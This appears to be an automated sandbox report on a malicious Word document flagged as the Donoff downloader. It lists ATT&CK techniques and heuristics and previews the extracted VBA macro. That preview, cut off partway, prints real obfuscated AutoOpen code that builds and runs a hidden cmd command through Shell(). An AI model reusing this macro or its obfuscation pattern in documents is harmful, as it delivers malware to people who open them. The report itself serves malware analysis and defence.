Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Downloader.Donoff-6666920-0' further supports its nature as a downloader. The macro's obfuscated nature and reliance on Shell() suggest it is designed to fetch and run a secondary payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Donoff-6666920-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Donoff-6666920-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25032 bytes |

SHA-256: eb8d6c1cddfe7f3dc1593694339ce8289275386a1a8395eada89db9042b67cfe
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "aADKbChjVmOC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Cos(hDACzF - tBJrN)
TypeName QLRAiJ
TypeName CInt(wdYNvE + bhJdEU + 22172 / NoJZQz)
TypeName CLng(37593 * 48944)
TypeName Oct(rPcQD / EUYZCr - 99240 / TwGCM)
VBA.Shell# KeyString(MOFAUSiFMz + droPrjWXAJoA + vbKeyC + JESAGEphonuEB + DfPmJnTclq) + UVCaFvc + nMqstvDAVnf + sLuFS + DSWfrS + hmNOs + zzjuaW + UJowB + BdDlS + pUGHU + uzrlWk + dpWYXWVt + rUOwZZok + YzFBAiNtl + NzCzHm + iClGfGDAcTT + wRZLrhKjEvt + JkzBhOoNzml + SmjdGfCjKwTf + wQFjAAmLLwJ, 703878661 - 703878661
TypeName CSng(wJQMFs - zpjZr)
TypeName sPDYU
End Sub
Attribute VB_Name = "zpwjoXzGbjUFh"
Function sLuFS()
On Error Resume Next
TypeName 63
TypeName Sin(tibdZ)
TypeName 176
dTLEYnoCv = "m" + "d " + "/V" + ":O" + "/" + CStr(Chr(idHMFFazITF + BUuVULUqcWTS + 67 + zDKqIOELslvAm + jKJadVmdNmzznF)) + " " + " " + " " + CStr(Chr(uXScuzdzNhpbJ + YGwtMJrFR + 34 + zDKRRFmzBd + zlhLMvjKUnTY)) + "set" + " nx"
TypeName hPOQz
TypeName CDate(325766200)
czasYiXbBdf = "=" + "h" + "H" + "k" + "K" + "JTz" + "QKK" + CStr(Chr(MtdCSBRUzZnwQ + LYpFVwIfwfJlB + 67 + kmaatsTw + TflHYPfwU)) + "j" + "b" + "YEz" + "u" + CStr(Chr(iTUtDOfWI + OpoAVpqws + 108 + mCRWXZPdojz + SGjpinc)) + "Ed"
TypeName Hex(WJzTJ)
TypeName TjKcs
buHQMRV = "j" + CStr(Chr(DQwSXup + PoAjSchqFG + 99 + jRtiiPJASFz + wBaECVnjIhGF)) + "uz" + "J" + "kTT" + "m" + "Dza" + "pG" + "dEA" + "K3"
TypeName Atn(MvkjUB)
TypeName ChrB(jiGHjc * hntCH - nvAtR / QpLkr)
TypeName Cos(67)
NnMHow = "y{t" + "' " + "M" + "x" + "We" + "f" + "wv6" + "F" + "(ro" + "@+"
TypeName CBool(OpnNm)
TypeName Atn(zmhdup)
IPMUMtPM = "}/" + "." + "snR" + "$" + "7:9" + "N" + "P" + ";" + "-" + "=Z\"
TypeName 3097
TypeName zVZAj
TypeName CDate(9)
nkFCMtuflua = CStr(Chr(EInhVXbUzCkpf + FKrYwUa + 76 + DlrrajmcvbEs + cDJdBXUNqH)) + "Sg" + ",i" + "B)&" + "&f" + "or " + "%" + "Q" + " i"
TypeName Sgn(320524144)
TypeName uOiwa
TypeName Tan(346)
flVQmD = "n" + " " + " (" + " " + " " + " " + "32 " + " " + ", " + " " + "55 " + " ," + " "
TypeName Hex(2482)
TypeName oVIJw
qFOZvWzEsza = " " + " " + " 4" + "9 " + ", " + " " + "47" + " " + "," + " 5" + "4" + " " + ", "
TypeName 53
TypeName 8604
JuuEDzjiT = " " + " 6" + "1" + " " + ", " + " " + "0, " + "47" + ",17"
TypeName Hex(fUffM + UiBlSU)
TypeName owUWAu
TypeName CDate(CXDfU * whKWcN + BVbOj / Ppaiwl)
ItwpfDslP = " " + " " + " " + "," + " " + "1" + "7" + " " + " " + ", " + " "
TypeName Sqr(82723 - Jrlcw * JDzNS / aWiiz)
TypeName Rnd(255)
TypeName Fix(8597)
wIoqhzz = " " + "43" + " ," + "64" + ",75" + " " + "," + " " + " " + "75 " + " " + " " + ","
TypeName Chr(88161 + KIkpz + SOGiUF + EmqQZu)
TypeName Atn(22616 - WwoVvi + 36047 / BPVaU)
TypeName Log(3)
LVrzs = " 1" + "7 " + "," + " " + "7" + "2" + " " + ", " + "62" + " " + " ," + "4"
TypeName bjwMf
TypeName Tan(33229 - ZMcMPK)
mcTOOD = "7 ," + " " + " 4" + "9 " + " " + ", " + "71 " + ",55" + " " + " ," + " 1" + "2" + " "
sLuFS = dTLEYnoCv + czasYiXbBdf + buHQMRV + NnMHow + IPMUMtPM + nkFCMtuflua + flVQmD + qFOZvWzEsza + JuuEDzjiT + ItwpfDslP + wIoqhzz + LVrzs + mcTOOD
TypeName CDbl(dNrLGX)
TypeName Hex(92042 / TFlzz + jwwiG + 12894)
TypeName Sin(bSqWiR)
End Function
Function DSWfrS()
On Error Resume Next
TypeName CBool(jbqAd * UISYDn / UvvzQz + BAziwK)
TypeName Sqr(523378403)
vLqBT = "," + "2" + "0 " + " " + " ," + " " + " 47" + " " + " , " + " " + "21" + ", 4" + "1,"
TypeName hobimD
TypeName 91
TypeName Int(SSwzTa)
EhbwjLzTH = " " + "43 " + " , " + " " + " " + "6" + "8 " + " " + " , " + "4" + "7"
TypeName Oct(53834 * nGqoz)
TypeName bMDTiK
ktkhi = "," + " 4" + "1" + " " + ", " + " 6"
TypeName CDbl(83575 - LsirT / zhsEh * jTE
... (truncated)
```